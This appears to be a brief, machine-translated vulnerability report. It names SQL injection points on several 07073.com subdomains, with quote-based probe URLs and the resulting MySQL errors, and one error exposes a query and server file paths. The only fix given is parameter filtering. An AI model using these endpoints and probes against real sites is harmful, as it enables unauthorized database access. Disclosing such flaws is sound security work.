Http://sj.07073.com /? M = news and id = 152
SQL Injection
Time: pm Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ 'limit 1064' at line 1 Errno: Script:/index. php MySQL Query SQL Error
Proof of vulnerability:
Http://cosplay.07073.com /? M = cosPlay & id = 954
Time: pm Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ & #39; and 'title '! = ''Order by id asc limit 1064 ''at line 1 Errno: Script:/index. php MySQL Query SQL Error
Time: pm Error: Unknown column '95aaaaaaaaaaaaaaaaaaaaa 'in 'where Claus' Errno: 1054 Script:/index. php MySQL Query SQL Error
Author zhk
Http://fahao.07073.com /? Action = subscribeinfo & id = 46'
Time: pm Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ 'limit 1064' at line 1 Errno: Script:/index. php SQL: select * from 'bbs073 '. 'uchome _ gift_advance 'where id = 46 \ 'limit 0, 1
[0129] Code: Object (Db_MysqlClass)-> Function (errorlog); file:/www/wwwroot/fahao2.07073.com/lib/db/mysqlclass.php
[0141] Code: Object (Db_MysqlClass)-> Function (query); file:/www/wwwroot/fahao2.07073.com/lib/db/mysqlclass.php
[1788] Code: Object (Db_MysqlClass)-> Function (get_one); file:/www/wwwroot/fahao2.07073.com/app/controller/index.php
[0090] Code: Object (Controller_Index)-> Function (actionsubscribeinfo); file:/www/wwwroot/fahao2.07073.com/lib/dispatcher.php
[2, 0057] Code: Object (dispatcher)-> Function (call); file:/www/wwwroot/fahao2.07073.com/lib/dispatcher.php
[2, 0024] Code: Object (dispatcher)-> Function (run); file:/www/wwwroot/fahao2.07073.com/www/index.php
MySQL Query SQL Error
Author: zeracker
Solution:
Filter parameters